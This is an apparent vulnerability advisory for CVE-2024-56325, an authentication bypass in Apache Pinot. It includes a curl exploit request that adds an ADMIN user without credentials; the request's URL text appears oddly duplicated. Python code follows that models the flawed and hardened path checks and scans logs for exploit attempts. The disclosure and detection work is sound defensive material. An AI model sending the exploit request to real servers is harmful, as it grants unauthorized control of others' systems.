CVE-2024-56325

Severity CVSS v4.0:
Pending analysis
Type:
Unavailable / Other
Publication date:
01/04/2025
Last modified:
01/04/2025

Description

Authentication Bypass Issue

If the path does not contain "/" and contains ".", authentication is not required.

Expected Normal Request and Response Example

curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users

Return: {"code":401,"error":"HTTP 401 Unauthorized"}

Malicious Request and Response Example

curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .

Return: {"users":{}}

A new user gets added bypassing authentication, enabling the user to control Pinot.
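Added example (not Pinot's code and not part of the advisory): a hypothetical model of the exemption rule the description states, a hardened allow-list check beside it, and a scan over constructed access-log lines that flags requests the flawed rule would have let through unauthenticated. The static-asset extensions and log format are assumptions.

```python
"""Model of the CVE-2024-56325 exemption rule as the advisory describes it.

Flawed rule: a request path with no '/' and at least one '.' is treated as a
public static asset and skips authentication. The hardened rule below instead
normalises the path and exempts only an explicit allow-list of asset types.
"""
import re
from urllib.parse import urlsplit

# Assumption: the UI's static assets use only these extensions.
STATIC_EXTENSIONS = {".html", ".js", ".css", ".png", ".ico"}

def strip_leading_slash(path: str) -> str:
    return path[1:] if path.startswith("/") else path

def is_exempt_flawed(path: str) -> bool:
    """Exemption rule exactly as stated in the advisory: no '/' and a '.'."""
    p = strip_leading_slash(path)
    return "/" not in p and "." in p

def is_exempt_hardened(path: str) -> bool:
    """Exempt only a single path segment whose extension is allow-listed.
    Query string and matrix parameters (';...') are dropped first so they
    cannot influence the decision; anything else fails closed."""
    p = strip_leading_slash(urlsplit(path).path).split(";", 1)[0]
    if "/" in p or ".." in p:
        return False
    return any(p.endswith(ext) for ext in STATIC_EXTENSIONS)

# Common-log-style request line, e.g. "POST /users HTTP/1.1" 401
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def find_suspicious(log_lines):
    """Return (method, path) for requests the flawed rule exempts but the
    hardened rule does not: candidates for an unauthenticated API call."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if m and is_exempt_flawed(m["path"]) and not is_exempt_hardened(m["path"]):
            hits.append((m["method"], m["path"]))
    return hits

# Constructed sample log lines (not real Pinot logs).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Apr/2025:10:00:00 +0000] "GET /index.html HTTP/1.1" 200',
    '10.0.0.5 - - [01/Apr/2025:10:00:01 +0000] "POST /users HTTP/1.1" 401',
    '10.0.0.9 - - [01/Apr/2025:10:00:02 +0000] "POST /users;v1.0 HTTP/1.1" 200',
]

if __name__ == "__main__":
    print(find_suspicious(SAMPLE_LOG))
```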

Impact